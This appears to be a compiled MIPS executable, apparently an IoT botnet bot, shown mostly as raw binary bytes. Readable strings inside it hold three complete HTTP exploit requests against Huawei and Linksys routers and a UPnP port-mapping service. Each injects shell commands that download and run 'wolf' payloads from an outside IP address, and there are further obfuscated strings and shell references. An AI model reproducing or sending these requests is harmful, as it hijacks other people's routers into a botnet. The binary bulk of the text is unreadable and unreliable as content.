<���'!���'$���!�(��� ������!(���'@���'�'���,$
��� ��'t���!�@���! @� � �������$����P��@����!����� ��
�Ï!�(���$��� �����0��'�������������
<��'!��'
���������F$
���t�����!�@� � ���������P���$
�������� ��'�������������
<���'!���' ���
�������������!���������@! �� � �������
�@���������� !�@�! Q� � !�@�����A!���$!� ���
��������(��'�
< ��'!��'
����������$
���t�����!�@� � ���������P���$
�������� ��'�������������
<���'!��'
���������$
���t�����!�@� � ���������P���$!�
�������� ��'���������
<`��'!���' ���
���������!���4���!���!(��! � � ��$��"�����������"��#������"�������
�"�����
�� �"����� ��$�"�����$��(�"�,���(��8�"�<�#�8��<��X�"�����X��`�"�d�#�`��d��@�"�����@��H�"�����H��P�"�����P��D�"�����D��L�"�����L��T�"�����T�� ���
��������(��'�
<@��'!���' ���
���������!���4���!���!(��! � � ��$��"�����������"��������"��������"�������
�"�����
�� �"����� ��$�"�,���(��0�"�����4��P�"�����T��T�"�����X��8�"�����<��@�"�����D��H�"�����L��<�"�����@��D�"�����H��L�"�����P�� ���
��������(��'��������������(.��!��&@���13��#H��)1� #0������!(������! �� ��0�#8��!8��!0�����������
������������
��� ��$ ��$���������������������0�#8��!8��!0�������$��$���������!8��������$��$�������������#8���0��#0���������!(������! ����0#8��!8�����������$��$���������!0��������������
<�'!���'$��� ���
�������������!���!�����!�����Ќ � ! �!�������ȃ��!(@! ��@!������0� � ��������C$���! ��@!(�� � �������!�����"���@���#�!�$��� ���
������!`���(��'������!��
��������d���������c$�B$��F��������!��!���������
<�'!�@��!X������[email protected]���
$)��.�
$��������@�!I���B������B02�@!8����������$��(,�@��$������@�!C�@�!i���c�!0E��b0�@�B)�@����
����$��������$ �b0�@������%@G��J%�B)�@�����`��1���$"����0�*�
���%E�%d�%b��$����c���!�����������
<���'!���',��(�������������� � ��$�����'�� �$!P���@���c$��a�����! � � �$����@!(�H����$ � !0����������������`b������@�$`b�������� � �&�������
������� � �$������������� � �&�����������$`�������b�$4���`��!(�����' � ��$��� �$��'��$������!E���D���c$��a��샙������$���' � !0������������b�$`��
���`���$�b�$`�� � �$
���������������
<���'!�
���h���������C�,���|�������C������
<�'!��'������t���!(��!0 ! ���$
�������+(E�! ������b�!�� � ����
�$�����$��C����!���� ��'�����0���������E��$���$��!����0��@��%���
�%HC��~<��K4�<�J4��������&"'�!K�&C�$J���@��$�������$���$���$�E���$��!`��������� �E!�����������E!�����������E!���������������
��!����������g���������c$�����������$�B$���������!�������������
<@��'!��'
���������h������� � !������!(�l���
������! @�� ��'�����
<�'!���' ���
��������������$B$��Y������#��P$��$ � ��&��������1���� ���
��������(��'�����
<���'!��'���
������������
<\��'!� ������� 9' � �����������
��������� ��'����POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.244.78.187 -l /tmp/binary -r /bins/wolf.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
����VUUU/���POST /tmUnblock.cgi HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+wolf.mpsl%3B+wget+http%3A%2F%2F104.244.78.187%2Fbins%2Fwolf.mpsl%3B+chmod+777+wolf.mpsl%3B+.%2Fwolf.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1����
����������������������POST /picsdesc.xml HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Hello-World
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`wget http://104.244.78.187/bins/wolf.mips -O - > /var/kekl;sh/var/kekl`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
� ����@��vkkp����pwckmjckj���pe^~D45�wkhkoa}�pe^~D670=1<1=���pahjape`imj�|g7155��`abeqhp�e`imj���rm~|r���qwav����K|lhsWC<����W6bCuJBw����phNstfk2����cqawp���567012��56701���wqttkvp�<<<<<<��rwpevgei6451����64514246����lD76Hq}@����lmtg715<����lwhsmbmgei��1qt�lk0qoq2ep���
��\���\���x���|���h���4��� �� ��4�� �� �� ��4��4���� �P�������� �Fkqp$Pk$Fqj$E$^kkp�+tvkg+�+a|a���+b`����+tvkg+jap+pgt��+ietw��+tvkg+jap+vkqpa����ewwskv`����+wpepqw����wlahh��ajefha�w}wpai�wl�fel����wpevp��hmjq|wlahh��+fmj+fqw}fk|$SKHB��SKHB>$etthap$jkp$bkqj`�jgkvvagp���kcmj���ajpav��+`ar+sepgl`kc��+`ar+imwg+sepgl`kc�+wfmj+sepgl`kc�+fmj+sepgl`kc��+`[email protected][sepgl`kc�+`[email protected]+sepgl`kc�+`ar+sepgl`kc4�+apg+`abeqhp+sepgl`kc��+apg+sepgl`kc��SKHB`kcapg�g*skhbmkp*|}~��~B��w*skhbmkp*|}~��3���������������l/��|/���.��/��
/��0/��D/��X/���������������������������� ���?�����������/bin/sh�sh��-c��/dev/null�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� ������������������`��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������E��E�����
E���������������������������������������������������������������������@�����ڭ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������xE����������������������������������������9�㼥ͤtg
Q>��PN�aP�qk�,�j��j�6�H�T���7����q�YI��σ�7 q��R�>)��O �q��
N�9�N�����L(���K���@��K��箂CAk[S�ž����������E��E��E���� ������8E������������������������������������� A��
A��
A����������������������������������������������E���A���@���@�`�@�`�@� �@�0�@��E���@���@� E�p�@��E�<E�@E�L�@��E���@���@� �@�P�@�������������������������������������������������������������������������������������������������������������������@�p�@���@��E�`�@�����`�@�����л@�4E��@�`�@��E�@�@�PE���@���@���@���@���@� �@��[email protected]���@��E��@�`E�`�@��@���@�@�@�\
@��E���@�������@���@�hE���@��E��E�pE��@���@�X @�(E�@�@��E��E�8E��E�`�@�[email protected]���@��E�`E�8E��
@�[email protected]�
@�����8E� �@�(�@�dE��@@�����l@�`E��E���@�,[email protected]��@��
@���@��@���@�`�@�0�@�$�@���@�
@��@��E��[email protected]��E�0�@��[email protected]���@���@��@�0E���@���@���@�`�@���@��@��E��E��[email protected]���@��@���@�p�@��E��[email protected]�`�@�pE���@���@�|E��@���@�и@���@���@�[email protected]�������@���@�<�@���@�������@��E�@�@��@�P�@��E�p�@�\�@���@��
@���@�$E��@���@���@��}@��E�`[email protected]�[email protected]���@�p�@���@��E� �@�,E� �@��@�hE�4E���@��E�\@�\�@�Į@���@���@���@���@��E���@�dE���@��@� �@� �@�[email protected]���@�0�@�[email protected]�`[email protected]�P�@��
@��@��@�,�@���@� �@���@���@��E��E���@�0E���@���@���@��@���@�P�@���@���@�@�@�@�@���@��@��E��E���@���@��.shstrtab�.init�.text�.fini�.rodata�.ctors�.dtors�.data.rel.ro�.data�.got�.sbss�.bss�.mdebug.abi32�����������������������������������������
�����������@��������������������������������� @� ������������������������������ �@� ���\������������������
�����������@�����@�����������������%����������E���������������������,���������E��������������������3���������E��������������������@��������� E� �������������������F���������E��������������������K���������E���$������������������Q����������E���������������������V��������������������������������������������������d������������������
ELF���������������@`���4�
���4� ��(��
��������@���@���
`�
`������������E��E������
P������dt�Q��������������������������<
�'��
��!'������
��������<
�'�����!��� ����'9� � ����������������<
�'�����!���
����'9�P � ��������������
������'�� <
�'�����!'��د�� ���
��������������"�����@�
������������ �����Y������ � $B� � � � ����Y������ ��$B���������@�$����
�������� � $�
`���$��"Џ�� ���
�����'��(<
�'�����!'���������
�������$�
`@�$�� � ������������������������@�$� �������� �'�� ���������'�� ������!�����<
�'��4��!���!���,����'��$����$'���� ��������������������P���� � �����������������������<
�'�����!'��ȯ��0���,���(���$��� ���
���������p���!��!0���0������K � $�����P�����@�
�������0���,���(���$��� ���
�����'��8���p���� � �������P�����@��������p���� � @ !����������
���� � ��������@ !�������� � $� ����������h���� � �� !���������F����������������������C�������d�������������Q�
��(!$����������d������������Q��$c��������L` !�(! � �0!����������<
�'��D��!'���
�����������������������>������������B������������F�����
������J�����������N���
��������R�����������V�����
������Z����� ������^���
��$������b��� ��(������f���$��,������j���(��0������n���,��4������r���0��8������v���4���8���
�����'�� �������� � $� �������������������� � $� ������������������� � $� ��
����������������� � $� �����������
�������� � $� ������������������� � $� ������������������� � $� ��
����������������� � $� �� ���������
�������� � $� ��$��������� �������� � $� ��(���������$�������� � $� ��,���������(�������� � $� ��0���������,�������� � $� ��4���������0�������� � $� ��8���������4�������� � $� ������8���
�����'�� <
�'��4��!'������T���P���L���H���D���@���<���8���4���0���,�����!@����!$�������@�
$������T���P���L���H���D���@���<���8���4���0��'��X���@���(����������0������$���ט!�+@����������� ! � $���� �����&��@(!!$D�$��B��C��&R��������������D��$���!"#$T����+�������$��� ������������������ � ����������$����@��������
�@�!���!���&1�����&�@��@ ! � ����������������$���菿�T���P���L���H���D���@���<���8���4���0 �'��X�B������@�0V�����$���t���� � ����������(�@�����$���t��� � !������0e�� � �0!��������������� ! � $����$������&���@��&����B����$`������P�&���p*@��$�����$&R���
���!��������b������"��p�����p*@����������&� � $����@(!���D�"���@ ! � �0!&��p #!��!���'��$���$r����$����������<
�'��$��!0�����0������0���F�
$������@!�b�������$c�%�����`(!����!����������������������� �����<
�'�����!0�����0������0���F�
$������@!�b�������$c�%�����`(!����!������������������P���� �$�
<
�'��<��!'��د��$��� ���
����������$����� � $�����%�������4�����@�!�D��$��(������ � $���$������������b!$���p���B���$��$� � $�����%�������@�!�����D��$��(������ � $���$������������b!$���p���B���$��$� � $�����%�������@�!�D������$��(������ � $���$��������b!$���B���p���$�����$��� ���
���$���'��(<
�'�����!'������\���X���T���P���L���H���D���@���<���8�������0������d@ !$���! � 0������@ !����$� � �@�!��� !�����(!$�4�� � �@�!���0B������ !�(!$�4�� � ���0���0B������ !�(!��0!$� � ���,��� !�����(!$�$� � 0S�����,���4�������������
��� ���$��!b�p��!@�H�������d��
���(������� � $����(���&��R�<&1�����4�� � $�����������04�����lC�F�����"����(���`$c����($�$� � ��0!���$�������@ !'��$�'��C�9�������,$������� � ���
�"����,B� ���l@�� (!�0� � �����#�����b�!�0�������� (! � $����(���&��R��&1�@��������+���!���!!�!���0�D���e��`0!$@� � &1����2��&�@������������� � �����������"����\���X���T���P���L���H���D���@���<���8��'��`���l���� � �������0B��������,���!���!�!�P������� ! � `(!����!���0�D���(!`0!$@� � &1����2��&��@�������������<
�'��l��!'������\���X���T���P���L���H���D���@���<���8�������0������d@ !$���! � 0������@ !����$� � �@�!��� !�����(!$�4�� � �@�!���0B������ !�(!$�4�� � ���0���0B������ !�(!��0!$� � ���,��� !�����(!$�$� � 0S�����,���4�������������
��� ���$��!b�p��!@�H�������d��
���(������� � $����(���&��R�<&1�����4�� � $�����������04�����lC�F�����"����(���`$c����($�$� � $����$�������@ !'��$�'��C�9�������,$������� � ���
�"����,B� ���l@�� (!�0� � �����#�����b�!�0�������� (! � $����(���&��R��&1�@��������+���!���!!�!���0�D���e��`0!$@� � &1����2��&�@������������� � �����������"����\���X���T���P���L���H���D���@���<���8��'��`���l���� � �������0B��������,���!���!�!�P������� ! � `(!����!���0�D���(!`0!$@� � &1����2��&��@�������������<
�'���!'��X�����������������������������������������������0���` !���!$���! � 0�������(!���� !$���8! � �@�!���0B�������(!$�4�� ! � ���8����(!���� !$�$�@ � ���`���0B�������(! !$�$� � ���0����(!����$�4�� ! � �������(!���� !$�4�� � ���\����(!���� !$�4�� � ���X����(!���� !$���8! � ���T����(!���� !$�
$� � ���P����(!���� !$�
��8! � �@�!����(!���� !$�
��8! � ���L����(!���� !$���8! � ���H����(!���� !$���8! � ���D����(!���� !$���8! � ���@������<���Џ����G���(! ! � $����$����`$�$��@�! � $�������PU�@�!����$�$���� ���� !��(!$� � '�� ���PC�
�����`���\0B�����4���X0c��0B�����,���(�
�`����� ���L���H0e����D0F�0g����@���<0H�0i�3��<��%@�-��4��<��[email protected]� L�4Q�����d���h���l���p���t���x���!����$�� � $���� � ��� !������v!�����p��<@�������l�Q$�C%<�4c���C$<��C%������8$�<�������0&������4@���$@���$��� ��� ��
�@���C#�U!�C����,�������
���(�Q$���<���C%<��4c���C$���d�����C%<��4c���C$���h�����C%<��4c���C$���l�����C%<��4c���C$���p�����C%<��4c���C$���t�����C%<��4c���C$���x�����C%���
���T$����$���( � ��)0B����$Bx��*$�
$���.��/���l$�$���, � ��-�����0$���8$�$���:��9��;���4��� ����$P�*`����� `��������� �� !���@�C#�U(!���v!����q��,B� @�D&2�$����R�������44��p�V�������,����P�\�������(����p�`�������T����P�f�������P����p�j������o�������� !$� � � �
��� !���X�"�
@(!$�($�( � �@���� ����[email protected]���E��� #�B��� !����$����$�<������� ! (! � $@���� ���$d���*@����� `������������ ���l��� � ������� ����[email protected]���� #�� !��������b�!$����0����l���� � 4�����4���p���"�
���l���� � ��������"����,����P���������l���� � �������(���p���"����l���� � ��������B����T����P���������l���� � �������P���p���B����l���� � �����������B����l���� � �����������B��������� � � !���������������������������������������������'���,��@���0!����$���,����0!`��$��$���0�����������0!0����C!�$�D!�'��0B����H!(�����
�*�@�$0����@!����$�(��@!`��$��$�������0�����C!�%� 1D���
!�D!�e!�F!�b!�,������0B���E!�,��������'��0B���������@!�����@!<
�'�v��!�������܌D�� �$� <
�'�u���!'��ȯ��0���,���(�������$�����!�����@ !������
��� P����$ � ��������������`$�$� � ��0!���&$�����$�P�'�"�� � � �����0������$���0! � � !���� !����4F�� � $�����#������'��H��$c���$�
$�,c����
����'��$�������`��(�$��"��$�� � ����������0���,���(��'��8<
�'�t���!'��x��������|��x��t��p��l��h��d��`������p���� � ��� ����@!����`�
�C����������|��x��t��p��l��h��d��`��'��$��b���������$���� � $������������Џ������� � �b���������������� � �� !���$ ������������ � $������@@!������� ������8!��(!�@0!� ��@�d#���C#�E!$���@�H!(��������@�$� `����(!���`$����� $�$� � $�����@�!����l�P������$���0! � � !���� !����4F�� � $����'�� ����D�d������$�$���D��� �����(! � $����@I�������l���� � ����0^��/�����@��<�����������4B��<��b$<��d%6��<@��p$�b%���l$�(&������ � ������
���<P������ $$�@�� %���$����l$�_��� ���
��� � ������������
<��b%���
'�D'��4'�X'��D��T��8��<��X'���'��,'��$'��(��@��P��H��L���������c�����������4���
��� $��`����$����l���4���8���< � ���@�������������������������
���l���� � ��������� !������� � �@�!����@ !���
���� � 2����
0R��$����0s��"���� ������4��&"��0B��,B�@��$�8"��$�
"��$��"��$��"��$�d"��$��"��$��"��."��@��&"��0B��,B�@��$�
"��$�"��$�"��$�"��$�
"��$�
"��$�
"��$�!"��$�7"��$��"��$��"�������������� � �����U��'����(��(#�@�e!�C(#���$�����<���P%�d%�C%��0��0��������$���� � ���
���������X���
����$�_����(!$�$���� � �������������$�������4$�������������T�����������8���6���$�( � $@���� ���$c�(b��@�h��� ��4���t���� � ���!����@�!�������d�����h��8������$� � $@����@���@ !����$�
b��,��(@���������Џ�T��������C��$���M����b��4�_��<������������b�������������^��<����
�����b$@��<��b$@��<��b$@��<��b$@�����������P$E�����*��@�`� ��@�d#���C#�����P!�d���@�� !�������`� $� $��&��O�` !�b�����@��$c ��<���
�b����� ����$�
� � ������������������D�� � ��������������h���� � �� !$��B�������L����.B�@�I.B� @��������E����.B�@@�B.B�@��������>����$��B��������9����.B�@�6.B�@��������2������
$��<����A�
����C%�P%���b%��:��0����<���P%�d%�C%��2��0��X��@�@��$B�C��������8�`!�@��$B�D�����!���!��(!����� $����$����$�������������D�B���E!�C�$�� �d%F(*���C�$���!��� ����$E�(���`�+��� � ��@�d#���C#�E!�����@���������C�!����������������������b���������C#,B�@������������ � �������$���������$���� � &���� ���$E�(���`�ׯ�� $�Q*@ !���,`����0 !��P���\��X��@$����8! � ����������������� � �� !�����(!������� ���b����� ����$E�(���`�G��� � ��@�d#�������C#�E!�����@�C�!�D��$������B��D���C!�C��������0c�`�~$���D�B���C!�C�$������0c�`�������B�����@��$��B�����S�I&Q������F�����&�!�D��f0#�(! � $@����@�'�@ !�(!!$�A��������@���������$��������������B������D!���ĮB��C� � !����R!��ՠ@������D�B���d!�d��$����� %&(*��W�d����U���!@� $��$���C�����$�b�#��������D�� � �������������� ����$Y
� � @ !�������������� !&E�X � $���C����$c������C�E��$�
��������b�z$��C�����b����������D�� � �������$�������C���@� ! � $������g������L������H������$���(4�� � $�@!���$���@�
����`�
$��B�����C�&P
S������D����k�C�����D�� � �������$���D����E�@���<)��P%�d%�C%����0���
����$E� � � !����������ĎQ�� � � !����@0!���0$@� ! � �(!���� !�������� � $
����&D��������� � $������
�S�<
�'�gX��!�������܌D�� �$� <
�'�g8��!'�ݐ��"l��"h��"d��"`��"\��"X��"T��"P��"L��"H������4'�90�����(!� ! � $����'�9���4�@ !��(!$� � ��"@���'��8���4@ !��(! � $���'��(����� !$��0!������
��� � ���$��������������� � � !$����C
$�0���t���� � $�����������t���� � $�����������t���� � $�����������t���� � $������(!�������� � $�����@ !���,���� � ��(!�@�!$�����b�'������@ !$� � `0!���@�m�������8����`��$�:b���!$�:$c�C!�B������@������D��$c�$c��$q�$f��!�C� ����`�$� b�$��B!�� !��$� e�$���C��$��`��$B�$��F�!�����!�@� � � !���� !�����@(! � �0!$�����C����(!��@!&$�D0!������8!`����!$� bs$� bq$��e������8!(��@�$������$��`�����!�����(!�!�C� ����`�
$� b�
$��B!��$� f������C��$��`��$B��!����D�!�@� � � !(B����@���(!�������� � � !��������������� � ` !��������������� � � !���@:��(!�������� � $��������������� � �@ !���@`�@�!���!���T���� � � !���@���@ !����������
����$B��0B��,B�
@��$��
����$� � ��(!����@(!�������� � � !��������������� � � !���@(!�������� � � !��������������� � � !���$�������(! � �@�!���� !�������� � �@(!�����"@����� ! � $�$�����C��$��������� � ��(!����@(!�������� � � !��������������� � � !���@(!�������� � � !��������������� � � !���$�������(! � �@�!����@(!�������� � � !�������������� � � !���@���@�!���T���� � ` !����@�!������"@$�@�u$����s���� � �������$��������� � ��(!����@(!�������� � � !��������������� � � !���@(!�������� � � !��������������� � � !���$�������(! � �@�!����@(!�������� � � !��������������� � � !���� !���
�������� � $��d��������������� � � !���� !�������� � &%�
�����"@����� ! � $������"@����W������ � ���������"@�����@(! � �0!���$�
���PW��@ ! � $
����$� �������� � �@ !����������T���� � ` !����@�!������"@$�@��$���������� � ` !����������T���� � � !���@� �@ !�������� � � !�
����������p���� � $��������������� � $��������������� � $��������������� � $������&�!$�������8!�!�D�!$�A���&$����$����$�������� � $��������������� � $��������������� � $��������������� � $�������!�!��"l��"h��"d��"`��"\��"X��"T��"P��"L��"H��'�"p$����K�� !$���6$����(���)���*���+���)���,����(������!<
�'�]���!'����쯾请䯶௵ܯ�د�ԯ�Я�̯�ȯ��������� � �� !����������p���� � �@�!����@!����`�
�C����쏾菷䏶��؏�ԏ�Џ�̏����'��$��r��4�_����$���� � ���
���$�_���`���$�$� � ��0!���R��@�!����'���@ ! � $����� !���x���� � $���������������� � $����$����`���$�$� � ��0!���R��@�!����'���@ ! � $����� !���x���� � $���������������� � $����$����`���$�$� � ��0!���R��@�!����'���@ ! � $����� !���x���� � $�����������p���� � $�����������x���� � $�����@�����,���t�`�����$$� � �b������������t���� � $����$��������� � ��(!���'��������� � �@(!�������������� � �b�!���'��(�����@ ! � $�
���� !�������� � �@(!���$�������(! � �!���� !�������� � �@(!���������,��(! � �@�!���R�Q������������ � �@ !�������������� � $��������������� � $����������$�����E�� � $����R��@!���$�������������C!�@�����(!�����@ ! � ��(#'��x'������`�!$����!'��8���������t���� � $������(!�������� � $��������������� � �@ !���@��@�!������� � $�����������T���� � � !���@�"�@ !���
����$B��0B��,B�
@��$��
���H���� � @ !�@�!"*���@�&��������� � �� !�P#(B�
���@2*b����T���� � � !$����@���@ !�������� � � !����������������� � �� !���$����t���� � �@�!���$����t���� � $�����$��������� � ��(!���� !�������� � �@(!����!���� ! � @(!���$�������(! � �@�!���0 !�������� � �@(!���$��������� � ��(!�������������� � �@(!�������b�!����@(! � !���$� ������(! � �@�!����@(!�������� � 0 !�������������� � $��������������� � $������������ ! � $����V�(�!�������� � �@����b��������
���� � �������b�
�������$����������� � �������@�����`�!��V��!���,��� � ��(!���V���@�!�������� � � !����������,� ! � ��(!�@�!$�����B�z�������t���� � $�����������t���� � $���������������@ ! � $����@���@�!����$� � ��(!�����(!����$� � �@�!��������������� � �@ !�@@!*���@���0!� !$��$���&!�����
$���C����������C�*������0!$���&!$�����$������$� � ��(!�����(!����$� � �@�!��������������� � �@ !�@8!*���@����(!���$��&��%!��$���C����������C�2������(!���$����$���$��������� � $��������������� � $���������������� � @ !���` !�������� � $� �����������$�@ � � !�������������� � $�@���$����p���� � `�!��������!���������$��@��<��4B�����������@�C!����������p���� � $������������������ � $��������������� � $���������������� � @ !��������������` ! � $� �����6����<
�'�S���!���H���܌D�� �$� <
�'�S���!'��ȯ��0���,���(�������$�����!�����@ !������
��� P����$ � ��������������`$�$� � ��0!���&$�����$�P�'�"�� � � �����0������$���0! � � !���� !����4F�� � $�����#�����'��H��$c���$�
$�,c����
����'��$�������`��(�$��"��$�� � ����������0���,���(��'��8<
�'�R\��!'�����|��x��t��p��l��h��d��`��\��X������p���� � ��� ����@!���H`�
�C����|��x��t��p��l��h��d��`��\��X��'��$��b���������$���� � $������������Џ������� � �b���������������� � �� !���$
����쏙������ � $�����@8!������� ������0!��(!�@ !�����C#$���G!(�������@�$�
�`����(!���`$���� $�$� � $�����@�!���QJ�"������$���0! � �@ !���� !����4F�� � $����'�� �����<�D������$�$���<��� �����(! � $����@'�������l���� � ����0^��/�����@��<�����������4B��<��b$<��d%6��<@��p$�b%���l$�(&������ � ������
���<P������ $$�@�� %������l$�$ ���� ���
��� � ������������
<��b%���
'��4'�D'�X��L��0��4'��D'���'��,'��$'��(��P��8��H��@��D�������������������������� ���l���4���8���< � ���@�������������������������
���l���� � ������$0E���6$����0c�����0������$����$���0B��,B�@��$�8���$�
���$�����$�����$�d���$�����$�����,���@��$���0B��,B�@��$�
���$����$����$����$�
���$�
���$�
���$�!���$�7���$�����$������������
��C%�F%�������b%�������$� � ���
���������X���
����$ �����(!$�$���� � ������������$�������4$�������������L�����������8���6���$�( � $@���� ���$c�(b�@����� ��!���t���� � ���!����@�!��������d�����h��0������$� � $@����@�w�@!����$�
D�s,b�(@���������Џ�T��������C��$���M����b��$ ���4�����#������b�������"�����^��<��#�
�����b$@��<��b$@��<��b$@��<��b$@�������"���P$E�����*�@�H�����������D�����C#�� !�������`� $�$�
�&��:�` !�b�����@��$c
���4���
�b����� ����$�? � ���������������������� � ��������������h���� � �� !$��b�"����a�
�,b�@�\,b� @�����Z�
�,b�@@�U,b�@�����S�
�$��b�����N�
�,b�@�I,b�@�����G�
���P��8�@��$B�Y��������0 !�@��$B�C�����!���!�� !$������� �����<�B���C!�C���� �d%&(*���C�����!��� ����$D�(��`�'��� �������������C#�D�!�������������������"�������C#,B�@�$���,B�@��$������<�B���Y!�C�$�� �d%F(*��۬C�$��� ���!$D�(��`�ۯ�� $�Q*@ !���,`����0 !��H���\��P��8$����8! � ����������������� � �� !����� !���쯠� ���b����� ����$D�(��`����� �������������C#�D�!�D��$������B��<���C!�C��������0c�`�~$��B��<���E!�C�$������0c�`�������B�����@��$��B�����S�I&Q������F�����&�!�D��f0#�(! � $@����@�'�@ !�(!!$�A��������@���������$�������������B������D!���ĮB��C� � !����R!��ՠ@������� � �������&����������� � $������]����@� $��$���C�����$�b�#��������D�� � �������������� ����'9? � @ !�������������� !&E�X � $��C����$c������C�Y��$�
��������C�~$��C�����b����������D�� � �������$�������B���@� ! � $������k������D������@������(���$4�� � $�@!���$���@�
����`�
$��B�����C�&P$�D������D����j�C�����D�� � �������$���D����H�@����
����$E�h � � !����������ĎQ�� � � !����@0!���0$@� ! � �(!���� !�������� � $菼�$��������� � &D�����D���������� � �������������� ����'9? � @ !���$����B�<
�'�F��!��� ���8$BO���b��<
�'�E���!'������H���D���@���<���8������`$����D$���� $� � ��0!�@ !����"��$����d$�����'�� 4��$� � �������0������$���0! � � !���� !�������4F�� � $��cl���`�S����<�4C�$����t���$$Yo���( � ���&����@������'��$�$��@(!$� � �@�!$�����C�B$�~�������b�F��������$Yo�$��$����&@(!$����$ � ���(����������p���� � $�����$���������� � ������������������� � $Yo���������� ����'9L� � ��������������
���|���� � &<����������|���� � &<������H���D���@���<���8��'��P���������C�����$����D���x�D�� � $������������bl����@�������������@l<
�'�C���!'��د��$��� ���
���������t���� � $�!�����(!�������� � $�!�������������( � �@ !���$�!������� � �@�!����������l ������0� � �����$��������D���
���8 !�����p!�b�� � �B�$zF����B����$��� ���
�����'��(<
�'�B���!'����(���$��� ������p���� � ��������@!���l`��C�����(���$��� ��'��0$��q���������t$���� � $�����������t���� � $�����������t���� � $�����������t���� � $�����������t���� � $�����������t���� � $�
����������t���� � $�
����������t���� � $�
����������t���� � $� �����(!�������� � $�����@ !���,���� � $����Q��@�!����<�4�W� ! � '�������������<�4�W� ! � ��0!����������p���� � $�
����������������(! � $�����@ !���,���� � $��@�!$���������(!�������� � $�����@ !���,���� � $��@�!$���������(!�������� � $�����@ !���,���� � $��@�!$���������(!�������� � $�����@ !���,���� � $��@�!$���������(!�������� � $�
����@ !���,���� � $��@�!$���������(!�������� � $�
����@ !���,���� � $��@�!$���������(!�������� � $�
����@ !���,���� � $��@�!$���������(!�������� � $� ����@ !���,���� � $��@�!$������r����������� � $��������������� � $��������������� � $��������������� � $��������������� � $��������������� � $�
�������������� � $�
�������������� � $�
�������������� � $� ����������h���� � �� !<
�'�>���!'�����D��@��<��8��4��0��,��(��$�� �������'������!���$� ! � ���!���� !���@���� � $������0!�����(! � $����$��������� � $����$���� �������� � $�L�����������$���� � '��h���$����(���L������������b��<�{$�4BY���� � ������������� ���8��� $BO'9L� � ������������������� � �������� !�������� � $� $����"���������l���� � $���������������� � �@�!����@�!������ � p�#��P���
���'��H���4� !'�� ���"�! � (!�����������ш!� �( � �(!���$� �������� � � !����������l���� � ������������������� � �@�!����@�!���Ď��� � q�#`�S���
���� !���4����! � �(!���Ѐ!�����(!$� � ���(����������t���� � $����$��������� � '��$������$�����@(! � $����$����
����$�8 � $��������������� � $���������������� � ������������������� � ��������������p���� � �������@�(��!��D��@��<��8��4��0��,��(��$�� ��'�H����� � ����(B� ���@�m����������� � � !�������������� � � !���� !�������� � �@(!�����Z����������� � '������� !�������� � ��
���$��������� � '���������������� � $���������������� � ������������������� � ������������������� � �����'��������� � ����������������� � ����'��0'��(��������������@��$B�R������@!�@��$B�S��$�����D�����E���������B���V!�D��$����� %�D�莰��������$����p������������@�c$����������B���v!�dh���� %�dh��!���D�����D��������*@������` !�����\$�
��������0���4$��@0! � ��8!�@!$�����b������`�<*���4c���C��'ç�� ���d#�����@�C#��#$��`�������D�����D��$���� �B���V!�C��������0c�`��$����p������������@�'�����������p�B���v!�@���bh������0B�@�w$���������������� � ��������������p�0�� � $������}�������������B���v!�d������ %�d�������!����$��������m�B���V!�C��������0c�`�e�������t���� � ��� ����@������$���(!$�$@ � �@�!���T������@��������� �������,�@��`(!����$�� � ���������F�4�����`$� � ��0!�@�!���P�Z��������$���0! � �@ !��� !����4F�� � $�������� ����� � ��������������p���䏅�($������b�� � $������<���������0�D���(!$� � $@������k����'��,����$���������,���(4�� � $���(���`�Q��������$�� � �������$�����l���� � �"��<��4c���C�����������p����� ��@�d!�C# � $D����������������'��8 � ���(�������������� � ������������������� � ��������������H���� � �������������� ���� � ������������������ � ������������������� � ���������
����� # � $� ����������h���� � �� !�������� � � !����������$���� � ��� ����$�����Џ��
���0�b��$�@$� � $@�����$�����0$��(! � $@���� �������(!���0�$�� � $@��������������$�
b��$�b����������$���������������� � ����������������p�P�� � $������z������������$�� � $@���T������@���(!����$��$� � $@�����$�����藦� `(! � $@���� �����`������������ � ` !�����Y��������$���(!$� � $@������P����<
�'�2L��!�������"l�Ex�������"��
��D&��&�C&��p�t��C&�$l��p�t���Bx<
�'�1���!'��د�� ���
������������� � �� !������������������ � �bl����������
